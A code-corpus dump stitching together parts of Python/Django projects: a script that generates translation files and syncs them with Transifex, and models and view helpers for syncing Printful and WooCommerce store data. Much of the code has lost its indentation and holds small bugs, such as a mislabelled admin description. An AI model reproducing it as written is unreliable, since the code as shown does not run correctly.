m_content += "[[Back to App|" + a_filename + "]]\n\n"
m_content += self.generate_model_table_md(model)
m_content += "\n\n" + self.get_rev_date()
print(" ".join([" - Writing file:",m_filename]))
f = open(WIKI_DIR + m_filename, 'w')
f.write(m_content)
f.close()
else: # No models.
a_content += "TODO: There are presently no models in this app."
a_content += "\n\n" + self.get_rev_date()
print(" ".join([" - Writing file:", a_filename]))
f = open(WIKI_DIR + a_filename, 'w')
f.write(a_content)
f.close()
else:
print("".join(["--> Skipping ",str(app.__package__),"..."]))
```
#### File: code/scripts/generate_messages.py
```python
from __future__ import print_function
#from django.db import models
#from django.apps import apps
from subprocess import call
#from pygithub3 import Github
#import urllib, operator, time
#from mmg.jobtrak import *
import os
from JobTrak import settings
class GenerateMessages:
APPS_DIR = os.path.join(settings.BASE_DIR,'mmg','jobtrak')
MANAGE_APP = os.path.join(settings.BASE_DIR,"manage.py")
TX_CONFIG = os.path.join(os.path.dirname(settings.BASE_DIR),".tx","config")
    def run_command(self,cmd,msg_ok="OK!",msg_err="An error happened."):
        # run the command handed in by the caller
        os.chdir(settings.BASE_DIR)
        try:
            retcode = call(cmd, shell=True)
            if retcode < 0:
                print(msg_err,"Error Code:", -retcode)
            else:
                print(msg_ok)
        except OSError as e:
            print(msg_err,"Execution Failed:", e)
def get_header(self,title):
rv = ("\n"+title+"\n")
val = "="
        rv += (val * ((len(title)//len(val))+1))[:len(title)]  # integer division keeps this working on Python 3
return rv
def make_messages(self):
print(self.get_header("Generating Global Project Message Files"))
os.chdir(settings.BASE_DIR)
cmd = ['python ' + self.MANAGE_APP + " makemessages -a --no-wrap"]
try:
retcode = call(cmd, shell=True)
if retcode < 0:
print("An error happened. Error Code:", -retcode)
else:
print("OK!")
except OSError as e:
print("Execution failed:", e)
print(self.get_header("--> Generating Messages by App"))
apps_list = os.listdir(self.APPS_DIR)
for app in apps_list:
app_path = os.path.join(self.APPS_DIR,app)
if os.path.isdir(app_path):
print("* Generating messages for the",app,"app...")
locale_path = os.path.join(app_path, "locale")
if(os.path.exists(locale_path)):
os.chdir(app_path)
cmd = ['python ' + self.MANAGE_APP + " makemessages -a --no-wrap"]
try:
retcode = call(cmd, shell=True)
if retcode < 0:
print("An error happened. Error Code:", -retcode)
else:
print("OK!")
except OSError as e:
print("Execution failed:", e)
else:
print("DIRECTORY DOESN'T EXIST", os.path.join(app_path,"locale"))
def pushpull_trans(self):
print(self.get_header("Interacting with Transifex"))
        self.run_command(
            ['tx push -s'],
            msg_ok="Successfully pushed new tokens to Transifex.")
self.run_command(
['tx pull -a'],
msg_ok="Successfully pulled new translations from Transifex."
)
def compile_messages(self):
print(self.get_header("Compiling Messages"))
self.run_command(
['python ' + self.MANAGE_APP + " compilemessages"],
msg_ok="Messages all compiled. Be sure to check in the .po language files to git.")
def run():
g=GenerateMessages()
if os.path.isfile(g.TX_CONFIG):
g.make_messages()
g.pushpull_trans()
g.compile_messages()
else:
print("--> Skipping language file management, since it's not configured.")
print(" You need the Transifex client configured. Visit this Web site")
print(" for more info: http://docs.transifex.com/developer/client/")
# echo " - Pushing source language to Transifex..."
# tx push -s
# echo " - Pulling translated languages from Transifex..."
# tx pull -a
# echo " - Compiling language files into .mo archives..."
#
# fi
#
#
# def run():
# g=GenerateMessages()
# g.make_messages_by_app()
#
# g.output_instructions()
``` |
{
"source": "559Labs/printaura-api-sync",
"score": 2
} |
#### File: src/business/helper_backend.py
```python
from django_tables2 import SingleTableView
from django.views.generic import DetailView, ListView, UpdateView, CreateView
from django.contrib import messages
class commonListView(SingleTableView):
model = None
table_class = None
object_name = None
object_icon = None
template_name = "business/object_list.html"
action_new = None
action_list = None
active_app = None
active_apptitle = None
table_pagination = {'per_page': 15}
def get_context_data(self, **kwargs):
context = super(commonListView, self).get_context_data(**kwargs)
context['active_app'] = self.active_app
context['active_apptitle'] = self.active_apptitle
context['object_icon'] = self.object_icon
context['object_name'] = self.object_name
if self.action_new:
context['action_new'] = self.action_new
if self.action_list:
context['action_list'] = self.action_list
return context
class commonCreateView(CreateView):
model = None
form_class = None
object_name = None
object_icon = None
template_name = "business/object_form.html"
success_url = None
action_list = None
active_app = None
active_apptitle = None
def get_context_data(self, **kwargs):
context = super(commonCreateView, self).get_context_data(**kwargs)
context['mode'] = "create"
context['active_app'] = self.active_app
context['active_apptitle'] = self.active_apptitle
context['object_icon'] = self.object_icon
context['object_name'] = self.object_name
context['action_list'] = self.action_list
return context
class commonUpdateView(UpdateView):
model = None
form_class = None
object_name = None
object_icon = None
template_name = "business/object_form.html"
success_url = None
action_list = None
active_app = None
active_apptitle = None
def get_context_data(self, **kwargs):
context = super(commonUpdateView, self).get_context_data(**kwargs)
context['mode'] = "update"
context['active_app'] = self.active_app
context['active_apptitle'] = self.active_apptitle
context['object_icon'] = self.object_icon
context['object_name'] = self.object_name
context['action_list'] = self.action_list
return context
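
# Subclassing sketch (the table class and URL names are hypothetical;
# bzBrand comes from business.models):
#   class BrandListView(commonListView):
#       model = bzBrand
#       table_class = BrandTable
#       object_name = "Brand"
#       active_app = "store"
#       action_new = "business:app_store_brand_create"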
def cleanValue(value, default=""):
return value if value else default
# class SuccessMessageMixin:
# """
# Add a success message on successful form submission.
# """
# success_message = ''
#
# def form_valid(self, form):
# response = super().form_valid(form)
# success_message = self.get_success_message(form.cleaned_data)
# if success_message:
# messages.success(self.request, success_message)
# return response
#
# def get_success_message(self, cleaned_data):
# return self.success_message % cleaned_data
#
#
# class MessageMixin:
# """
# Add a message on next screen
# """
# message = ''
#
```
#### File: src/business/models.py
```python
from django.conf import settings
from fractions import Fraction
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth import get_user_model
from django.contrib.auth import models as auth_models
from django.core.urlresolvers import reverse
from django.db.models import *
from django.db import models as models
from django.utils.translation import ugettext_lazy as _
from django_extensions.db import fields as extension_fields
from django_extensions.db.fields import AutoSlugField
from timezone_field import TimeZoneField
import uuid
from decimal import *
from pyPrintful import pyPrintful
from django.core.exceptions import ObjectDoesNotExist
from business.helper_backend import *
from storemanager.logger import *
logger = StyleAdapter(logging.getLogger("project"))
class commonBusinessModel(models.Model):
id = UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
date_added = DateTimeField(auto_now_add=True, verbose_name=_("Added"))
date_updated = DateTimeField(auto_now=True, verbose_name=_("Updated"))
class Meta:
abstract = True
# Primarily Store App Related
class bzBrand(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=2)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
vendor = ForeignKey('business.pfStore', blank=True, null=True, )
outlet = ForeignKey('business.wooStore', blank=True, null=True,)
class Meta:
ordering = ('code',)
verbose_name = _("Brand")
verbose_name_plural = _("Brands")
def __str__(self):
if self.code and self.name:
return "{} - {}".format(self.code, self.name)
elif self.name:
return "{}".format(self.name)
return _("Unknown Brand")
def get_absolute_url(self):
return reverse('business:app_store_brand_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:app_store_brand_update', args=(self.pk,))
class pfStore(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=50,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
pid = IntegerField(_("Printful ID"), default=0)
website = CharField(_("Website"), max_length=255,
default="", blank=True, null=True)
created = CharField(_("Created"), max_length=255,
default="", blank=True, null=True)
key = CharField(_("API Key"), max_length=64, default="", blank=True)
return_address = ForeignKey("business.pfAddress", verbose_name=_(
"Return Address"), related_name="returnaddress", blank=True, null=True)
billing_address = ForeignKey("business.pfAddress", verbose_name=_(
"Billing Address"), related_name="billingaddress", blank=True, null=True)
payment_type = CharField(_("Payment Card Type"),
max_length=64, default="", blank=True, null=True)
    payment_number_mask = CharField(
        _("Payment Card Number Mask"), max_length=64, default="", blank=True, null=True)
    payment_expires = CharField(
        _("Payment Card Expires"), max_length=64, default="", blank=True, null=True)
packingslip_email = EmailField(
_("Packing Slip Email"), default="", blank=True, null=True)
packingslip_phone = CharField(
_("Packing Slip Phone"), max_length=64, default="", blank=True, null=True)
packingslip_message = CharField(
_("Packing Slip Message"), max_length=255, default="", blank=True, null=True)
class Meta:
ordering = ('-created',)
verbose_name = _("Printful Store")
verbose_name_plural = _("Printful Stores")
    def __str__(self):
        if self.code and self.name:
            return "{} - {}".format(self.code, self.name)
        elif self.code:
            return "{}".format(self.code)
        return _("Unknown Store")
def get_absolute_url(self):
return reverse('business:app_store_pf_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:app_store_pf_update', args=(self.pk,))
def has_auth(self):
return True if self.key else False
has_auth.short_description = _("Auth?")
has_auth.boolean = True
def save(self, *args, **kwargs):
logger.debug('Method: pfStore.save() Called')
if self.pid == 0:
if pfCountry.objects.all().count() == 0:
pfCountry.api_pull(key=self.key)
self.api_pull()
self.api_push()
self.api_pull()
super(pfStore, self).save(*args, **kwargs)
@staticmethod
def get_store(store=None):
"""
Gets a 'default' Printful store, generally for use with the Printful API
methods on other related objects. If a store is provided, then it is
validated and returned. Otherwise, this method will attempt to grab the
first Printful store object in the database and return that.
If no stores are in the database, then this method will raise an exception.
The wrapping method will need to catch this and respond appropriately.
:param store: Optional. pfStore object. Will validate that it is a valid
pfStore object and return it back.
"""
if type(store) is pfStore and store.has_auth():
return store
else:
store = pfStore.objects.exclude(
key__isnull=True).exclude(key__exact='').first()
if store:
return store
raise ObjectDoesNotExist(
"Either provide a store object or add at least one pfStore with an API key to the database.")
def api_pull(self):
"""
Update current store with data from Printful API.
"""
if not self.has_auth():
raise Exception("This store is missing the API Key.")
# TODO Handle states/countries lookup Exceptions
api = pyPrintful(key=self.key)
sData = api.get_store_info()
        logger.debug(sData)
        logger.debug(api._store['last_response_raw'])
self.website = sData['website']
self.name = sData['name']
self.pid = sData['id']
self.created = sData['created']
self.packingslip_phone = sData['packing_slip']['phone']
self.packingslip_email = sData['packing_slip']['email']
self.packingslip_message = sData['packing_slip']['message']
self.payment_type = sData['payment_card']['type']
self.payment_number_mask = sData['payment_card']['number_mask']
self.payment_expires = sData['payment_card']['expires']
if sData['billing_address']:
_state = pfState.objects.get(
code=sData['billing_address']['state_code'])
_country = pfCountry.objects.get(
code=sData['billing_address']['country_code'])
self.billing_address, created = pfAddress.objects.update_or_create(
name=sData['billing_address']['name'],
company=sData['billing_address']['company'],
address1=sData['billing_address']['address1'],
address2=sData['billing_address']['address2'],
city=sData['billing_address']['city'],
zip=sData['billing_address']['zip'],
phone=sData['billing_address']['phone'],
email=sData['billing_address']['email'],
state=_state,
country=_country,
defaults={}
)
if sData['return_address']:
_state = pfState.objects.get(
code=sData['return_address']['state_code'])
_country = pfCountry.objects.get(
code=sData['return_address']['country_code'])
self.return_address, created = pfAddress.objects.update_or_create(
name=sData['return_address']['name'],
company=sData['return_address']['company'],
address1=sData['return_address']['address1'],
address2=sData['return_address']['address2'],
city=sData['return_address']['city'],
zip=sData['return_address']['zip'],
phone=sData['return_address']['phone'],
email=sData['return_address']['email'],
state=_state,
country=_country,
defaults={}
)
def api_push(self):
"""
Pushes the only data available to update via the API: packing slip info.
"""
if not self.has_auth():
raise Exception("This store is missing the API Key.")
data = {
'email': self.packingslip_email,
'phone': self.packingslip_phone,
'message': self.packingslip_message,
}
api = pyPrintful(key=self.key)
api.put_store_packingslip(data)
class wooStore(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=2, default="", blank=True, null=True,
help_text=_("Generally, a two-character uppercase code. Used in SKUs."))
base_url = URLField(_("Base URL"), default="", blank=True, null=True, help_text=_(
"Include the schema and FQDN only (e.g., 'https://example.com'). No trailing slash."))
consumer_key = CharField(
_("Consumer Key"), max_length=64, blank=True, null=True)
consumer_secret = CharField(
_("Consumer Secret"), max_length=64, blank=True, null=True)
timezone = TimeZoneField(default='America/New_York')
verify_ssl = BooleanField(_("Verify SSL?"), default=True, help_text=_(
"Uncheck this if you are using a self-signed SSL certificate to disable ssl verification."))
class Meta:
ordering = ('code',)
verbose_name = _("WP Store")
verbose_name_plural = _("WP Stores")
def __str__(self):
if self.code and self.base_url:
return "{} - {}".format(self.code, self.base_url)
elif self.code:
return "{}".format(self.code)
return _("Unknown Store")
def get_absolute_url(self):
return reverse('business:app_store_wp_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:app_store_wp_update', args=(self.pk,))
# Primarily Creative App Related
class bzCreativeCollection(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=3)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
bzbrand = ForeignKey('business.bzBrand', verbose_name=_("Brand"))
class Meta:
ordering = ('code',)
verbose_name = _("Creative Collection")
verbose_name_plural = _("Creative Collections")
def __str__(self):
if self.code and self.name:
return "{} - {}".format(self.code, self.name)
elif self.name:
return "{}".format(self.name)
return _("Unknown Collection")
def get_absolute_url(self):
return reverse(
'business:business_bzcreativecollection_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_bzcreativecollection_update', args=(self.pk,))
def get_designs(self):
return bzCreativeDesign.objects.filter(bzcreativecollection=self)
get_designs.short_description = _("Designs")
def num_designs(self):
return self.get_designs().count()
num_designs.short_description = _("Designs")
def get_layouts(self):
return bzCreativeLayout.objects.filter(bzcreativecollection=self)
get_designs.short_description = _("Layouts")
def num_layouts(self):
return self.get_layouts().count()
num_layouts.short_description = _("Layouts")
class bzCreativeDesign(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=2)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
bzcreativecollection = ForeignKey(
'business.bzCreativeCollection', verbose_name=_("Collection"))
class Meta:
ordering = ('bzcreativecollection__code', 'code',)
verbose_name = _("Creative Design")
verbose_name_plural = _("Creative Designs")
def __str__(self):
rv = []
if self.bzcreativecollection:
if self.bzcreativecollection.code:
rv.append(self.bzcreativecollection.code + "-")
if self.code:
rv.append(self.code)
        if self.bzcreativecollection:
            if self.bzcreativecollection.name:
                rv.append(" / " + self.bzcreativecollection.name)
if self.name:
rv.append(" / " + self.name)
if rv:
return "".join(rv)
return _("Unknown Design")
def get_absolute_url(self):
return reverse('business:business_bzcreativedesign_detail',
args=(self.pk,))
def get_update_url(self):
return reverse('business:business_bzcreativedesign_update',
args=(self.pk,))
def get_products(self):
return bzProduct.objects.filter(bzDesign=self)
get_products.short_description = _("Products")
def num_products(self):
return self.get_products().count()
num_products.short_description = _("Products")
class bzCreativeLayout(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=2)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
bzcreativecollection = ForeignKey(
'business.bzCreativeCollection', verbose_name=_("Collection"))
class Meta:
ordering = ('bzcreativecollection__code', 'code',)
verbose_name = _("Creative Layout")
verbose_name_plural = _("Creative Layouts")
def __str__(self):
if self.code and self.name:
return "{} - {}".format(self.code, self.name)
elif self.name:
return "{}".format(self.name)
return _("Unknown Design")
def get_absolute_url(self):
return reverse('business:business_bzcreativelayout_detail',
args=(self.pk,))
def get_update_url(self):
return reverse('business:business_bzcreativelayout_update',
args=(self.pk,))
def get_products(self):
return bzProduct.objects.filter(bzLayout=self)
get_products.short_description = _("Products")
def num_products(self):
return self.get_products().count()
num_products.short_description = _("Products")
class bzCreativeRendering(commonBusinessModel):
# Fields
# Relationship Fields
bzcreativedesign = ForeignKey(
'business.bzCreativeDesign', verbose_name=_("Design"))
bzcreativelayout = ForeignKey(
'business.bzCreativeLayout', verbose_name=_("Layout"))
class Meta:
ordering = ('bzcreativedesign__code', 'bzcreativelayout__code',)
verbose_name = _("Creative Rendering")
verbose_name_plural = _("Creative Renderings")
def __str__(self):
if self.bzcreativedesign and self.bzcreativelayout:
return "{} - {}".format(self.bzcreativedesign.code,
self.bzcreativelayout.code)
return _("Unknown Rendering")
def get_absolute_url(self):
return reverse('business:business_bzcreativerendering_detail',
args=(self.pk,))
def get_update_url(self):
return reverse('business:business_bzcreativerendering_update',
args=(self.pk,))
class bzProduct(commonBusinessModel):
STATUS_DRAFT = "draft"
STATUS_PUBLIC = "public"
STATUS_CHOICES = (
(STATUS_DRAFT, "Draft"),
(STATUS_PUBLIC, "Public"),
)
# Fields
code = CharField(_("Code"), max_length=64,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
status = CharField(_("Status"), max_length=32,
default=STATUS_DRAFT, choices=STATUS_CHOICES)
# Relationship Fields
bzDesign = ForeignKey('business.bzCreativeDesign',
verbose_name=_("Design"))
bzLayout = ForeignKey('business.bzCreativeLayout',
verbose_name=_("Layout"), null=True, blank=True)
pfProduct = ForeignKey('business.pfCatalogProduct',
verbose_name=_("Vendor Product"),
blank=True, null=True, )
wooProduct = ForeignKey('business.wooProduct',
verbose_name=_("Outlet Product"),
blank=True, null=True, )
pfSyncProduct = ForeignKey('business.pfSyncProduct',
verbose_name=_("Sync Product"),
blank=True, null=True, )
colors = ManyToManyField('business.pfCatalogColor',
blank=True, verbose_name=_("Colors"))
sizes = ManyToManyField('business.pfCatalogSize',
blank=True, verbose_name=_("Sizes"))
class Meta:
ordering = ('code',)
verbose_name = _("Product")
verbose_name_plural = _("Products")
def __str__(self):
return self.get_friendly_name()
def get_friendly_name(self):
if self.code and self.name:
return "{} - {}".format(self.code, self.name)
elif self.name:
return "{}".format(self.name)
return "Unknown Product"
    def __unicode__(self):
        return self.__str__()
def get_absolute_url(self):
return reverse('business:business_bzproduct_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:business_bzproduct_update', args=(self.pk,))
def get_variants(self):
return bzProductVariant.objects.filter(bzproduct=self)
get_variants.short_description = _("Variants")
def num_variants(self):
return self.get_variants().count()
num_variants.short_description = _("Variants")
def get_colors_as_string(self):
rv = []
for i in self.colors.all():
rv.append(i.__str__())
return ", ".join(rv)
def get_sizes_as_string(self):
rv = []
for i in self.sizes.all():
rv.append(i.__str__())
return ", ".join(rv)
class bzProductVariant(commonBusinessModel):
# Fields
code = CharField(verbose_name=_("Code"), max_length=64,
default="", blank=True, null=True)
is_active = BooleanField(verbose_name=_("Is Active"), default=True)
# Relationship Fields
bzproduct = ForeignKey('business.bzProduct', verbose_name=_("Product"))
pfcatalogvariant = ForeignKey(
'business.pfCatalogVariant', verbose_name=_("Vendor Variant"), )
pfcolor = ForeignKey('business.pfCatalogColor',
verbose_name=_("Color"), blank=True, null=True, )
pfsize = ForeignKey('business.pfCatalogSize',
verbose_name=_("Size"), blank=True, null=True, )
price = DecimalField(_("Price"), max_digits=5,
decimal_places=2, default=Decimal("0"))
class Meta:
ordering = ('bzproduct', 'pfsize', 'pfcolor',)
verbose_name = _("Variant")
verbose_name_plural = _("Variants")
def __str__(self):
rv = []
if self.bzproduct.code:
rv.append(self.bzproduct.code)
        if self.bzproduct.name:
            rv.append(self.bzproduct.name)
return " - ".join(rv)
def get_absolute_url(self):
return reverse('business:business_bzproductvariant_detail',
args=(self.pk,))
def get_update_url(self):
return reverse('business:business_bzproductvariant_update',
args=(self.pk,))
class wooAttribute(commonBusinessModel):
TYPE_TEXT = "text"
TYPE_COLORPICKER = "color picker"
TYPE_IMAGESELECT = "image select"
TYPE_TEXTLABEL = "text label"
TYPE_CHOICES = (
(TYPE_TEXT, _("Basic Text")),
(TYPE_COLORPICKER, _("Color Picker")),
(TYPE_IMAGESELECT, _("Image Select")),
(TYPE_TEXTLABEL, _("Text Label")),
)
ORDER_NAME = "name"
ORDER_NAMENUMBER = "name_num"
ORDER_ID = "id"
ORDER_MENU = "menu_order"
ORDER_CHOICES = (
(ORDER_NAME, _("Sort by Name")),
(ORDER_NAMENUMBER, _("Sort by Name (Number)")),
(ORDER_ID, _("Sort by ID")),
(ORDER_MENU, _("Sort by Custom Menu Order")),
)
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
wid = CharField(_("WP ID"), max_length=16,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
slug = CharField(_("Slug"), max_length=255,
default="", blank=True, null=True)
type = CharField(_("Type"), max_length=255, default="",
blank=True, null=True, choices=TYPE_CHOICES)
has_archives = BooleanField(_("Has Archives?"), default=False)
# Relationship Fields
store = ForeignKey('business.wooStore', blank=True, null=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Attribute")
verbose_name_plural = _("WP Attributes")
def __str__(self):
return u'%s' % self.slug
def get_absolute_url(self):
return reverse('business:business_wooattribute_detail',
args=(self.slug,))
def get_update_url(self):
return reverse('business:business_wooattribute_update',
args=(self.slug,))
class wooCategory(commonBusinessModel):
DISPLAY_DEFAULT = 'default'
DISPLAY_PRODUCTS = 'products'
DISPLAY_SUBCATEGORIES = 'subcategories'
DISPLAY_BOTH = 'both'
DISPLAY_CHOICES = (
(DISPLAY_DEFAULT, _("Default")),
(DISPLAY_PRODUCTS, _("Products")),
(DISPLAY_SUBCATEGORIES, _("Subcategories")),
(DISPLAY_BOTH, _("Display Both"))
)
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
wid = IntegerField(_("WP ID"), default=0, blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
slug = CharField(_("Slug"), max_length=255,
default="", blank=True, null=True)
parent = IntegerField(_("Parent ID"), default=0)
description = TextField(
_("Description"), default="", blank=True, null=True)
display = CharField(_("Display"), max_length=255,
default=DISPLAY_DEFAULT, choices=DISPLAY_CHOICES)
count = IntegerField(_("Count"), default=0)
image_id = IntegerField(_("Image ID"), default=0)
image_date_created = CharField(_("Image Created"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
store = ForeignKey('business.wooStore', blank=True, null=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Category")
verbose_name_plural = _("WP Categories")
def __str__(self):
return u'%s' % self.slug
def get_absolute_url(self):
return reverse('business:business_woocategory_detail',
args=(self.slug,))
def get_update_url(self):
return reverse('business:business_woocategory_update',
args=(self.slug,))
class wooImage(commonBusinessModel):
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
wid = CharField(_("WP ID"), max_length=16, default="", blank=True,
null=True, help_text=_(
"Image ID (attachment ID). In write-mode used to attach pre-existing images."))
date_created = DateField(_("Date Created"), help_text=_(
"READONLY. The date the product was created, in the sites timezone."),
blank=True, null=True)
alt = CharField(_("Alt"), max_length=255,
default="", blank=True, null=True)
position = IntegerField(_("Position"), default=0, help_text=_(
"Image position. 0 means that the image is featured."))
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Image")
verbose_name_plural = _("WP Images")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse('business:business_wooimage_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:business_wooimage_update', args=(self.pk,))
class wooProduct(commonBusinessModel):
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
wid = CharField(_("WP ID"), max_length=16,
default="", blank=True, null=True, )
slug = CharField(_("Slug"), max_length=255,
default="", blank=True, null=True)
permalink = URLField(_("Permalink"), blank=True)
date_created = DateField(_("Date Created"), help_text=_(
"READONLY. The date the product was created, in the sites timezone."),
blank=True, null=True)
dimension_length = DecimalField(
_("Length"), max_digits=10, decimal_places=2, default=0)
dimension_width = DecimalField(
_("Width"), max_digits=10, decimal_places=2, default=0)
dimension_height = DecimalField(
_("Height"), max_digits=10, decimal_places=2, default=0)
weight = DecimalField(_("Weight"), help_text=_(
"Product weight in decimal format."),
max_digits=10, decimal_places=2,
default=0)
reviews_allowed = BooleanField(_("Reviewed Allowed?"), help_text=_(
"Allow reviews. Default is true."), default=True)
# Relationship Fields
woostore = ForeignKey('business.wooStore', verbose_name=_(
"Store"), blank=True, null=True)
shipping_class = ForeignKey(
'business.wooShippingClass', null=True, blank=True)
tags = ManyToManyField(
'business.wooTag', verbose_name=_("Tags"), blank=True)
images = ManyToManyField(
'business.wooImage', verbose_name=_("Images"), blank=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Product")
verbose_name_plural = _("WP Products")
def __str__(self):
return u'%s' % self.slug
def get_absolute_url(self):
return reverse('business:business_wooproduct_detail',
args=(self.slug,))
def get_update_url(self):
return reverse('business:business_wooproduct_update',
args=(self.slug,))
class wooShippingClass(commonBusinessModel):
# Fields
wid = CharField(_("WP ID"), max_length=64,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
slug = CharField(_("Slug"), max_length=255,
default="", blank=True, null=True)
description = TextField(
_("Description"), default="", blank=True, null=True)
count = IntegerField(_("Count"), default=0)
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Shipping Class")
verbose_name_plural = _("WP Shipping Classes")
def __str__(self):
return u'%s' % self.slug
def get_absolute_url(self):
return reverse(
'business:business_wooshippingclass_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_wooshippingclass_update', args=(self.pk,))
class wooTag(commonBusinessModel):
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
wid = IntegerField(_("WP ID"), default=0)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
slug = CharField(_("Slug"), max_length=255,
default="", blank=True, null=True)
description = TextField(
_("Description"), default="", blank=True, null=True)
count = IntegerField(_("Count"), default=0)
# Relationship Fields
store = ForeignKey('business.wooStore', blank=True, null=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Tag")
verbose_name_plural = _("WP Tags")
def __str__(self):
return u'%s' % self.slug
def get_absolute_url(self):
return reverse('business:business_wootag_detail', args=(self.slug,))
def get_update_url(self):
return reverse('business:business_wootag_update', args=(self.slug,))
class wooTerm(commonBusinessModel):
# Fields
wid = CharField(_("WP ID"), max_length=16,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
slug = CharField(_("Slug"), max_length=255,
default="", blank=True, null=True)
menu_order = IntegerField(_("Menu Order"), default=0)
count = IntegerField(_("Count"), default=0)
wr_tooltip = CharField(_("WR Tooltip"), max_length=255,
default="", blank=True, null=True)
wr_label = CharField(_("WR Label"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
productattribute = ForeignKey('business.wooAttribute', verbose_name=_(
"Product Attribute"), blank=True, null=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Term")
verbose_name_plural = _("WP Terms")
def __str__(self):
return u'%s' % self.slug
def get_absolute_url(self):
return reverse('business:business_wooterm_detail', args=(self.slug,))
def get_update_url(self):
return reverse('business:business_wooterm_update', args=(self.slug,))
class wooVariant(commonBusinessModel):
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
wid = CharField(_("WP ID"), max_length=16,
default="", blank=True, null=True, )
date_created = DateField(_("Date Created"), help_text=_(
"READONLY. The date the product was created, in the sites timezone."), blank=True, null=True)
permalink = URLField(_("Permalink"), blank=True)
sku = CharField(_("SKU"), help_text=_("Unique identifier."),
max_length=255, default="", blank=True, null=True)
price = CharField(_("Price"), help_text=_(
"READONLY. Current product price. This is set from regular_price and sale_price."), max_length=255, default="", blank=True, null=True)
dimension_length = DecimalField(
_("Length"), max_digits=10, decimal_places=2, default=0)
dimension_width = DecimalField(
_("Width"), max_digits=10, decimal_places=2, default=0)
dimension_height = DecimalField(
_("Height"), max_digits=10, decimal_places=2, default=0)
weight = DecimalField(_("Weight"), help_text=_(
"Product weight in decimal format."), max_digits=10, decimal_places=2, default=0)
# Relationship Fields
shipping_class = ForeignKey(
'business.wooShippingClass', null=True, blank=True)
images = ManyToManyField(
'business.wooImage', verbose_name=_("Images"), blank=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Variant")
verbose_name_plural = _("WP Variants")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse('business:business_woovariant_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:business_woovariant_update', args=(self.pk,))
class wpMedia(commonBusinessModel):
STATUSBOOL_OPEN = 'open'
STATUSBOOL_CLOSED = 'closed'
STATUSBOOL_CHOICES = (
(STATUSBOOL_OPEN, _("Open")),
(STATUSBOOL_CLOSED, _("Closed")),
)
MEDIATYPE_IMAGE = "image"
MEDIATYPE_FILE = "file"
MEDIATYPE_CHOICES = (
(MEDIATYPE_IMAGE, _("Image")),
        (MEDIATYPE_FILE, _("File")),
)
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
alt_text = CharField(_("Alternate Text"), max_length=255,
default="", blank=True, null=True)
width = IntegerField(_("Width"), default=0)
height = IntegerField(_("Height"), default=0)
file = CharField(_("File"), max_length=255,
default="", blank=True, null=True)
author = IntegerField(_("Author"), default=0)
mime_type = CharField(_("MIME Type"), max_length=255,
default="", blank=True, null=True)
comment_status = CharField(_("Comment Status"), max_length=255,
default=STATUSBOOL_OPEN, choices=STATUSBOOL_CHOICES)
wid = CharField(_("ID"), max_length=16, default="", blank=True, null=True)
source_url = URLField(_("Source URL"), blank=True, null=True)
template = CharField(_("Template"), max_length=255,
default="", blank=True, null=True)
ping_status = CharField(_("Ping Status"), max_length=255,
default=STATUSBOOL_OPEN, choices=STATUSBOOL_CHOICES)
caption = CharField(_("Caption"), max_length=255,
default="", blank=True, null=True)
link = URLField(_("Link"), default="", blank=True, null=True)
slug = CharField(_("Slug"), max_length=255, blank=True, null=True)
modified = DateTimeField(_("Modified"), blank=True, null=True)
guid = CharField(_("GUID"), max_length=255,
default="", blank=True, null=True)
description = TextField(
_("Description"), default="", blank=True, null=True)
modified_gmt = DateTimeField(_("Modified GMT"), blank=True, null=True)
title = CharField(_("Title"), max_length=255,
default="", blank=True, null=True)
date_gmt = DateTimeField(_("Date GMT"), blank=True, null=True)
type = CharField(_("Type"), max_length=64,
default="", blank=True, null=True)
# Relationship Fields
woostore = ForeignKey('business.woostore', blank=True, null=True)
class Meta:
ordering = ('-pk',)
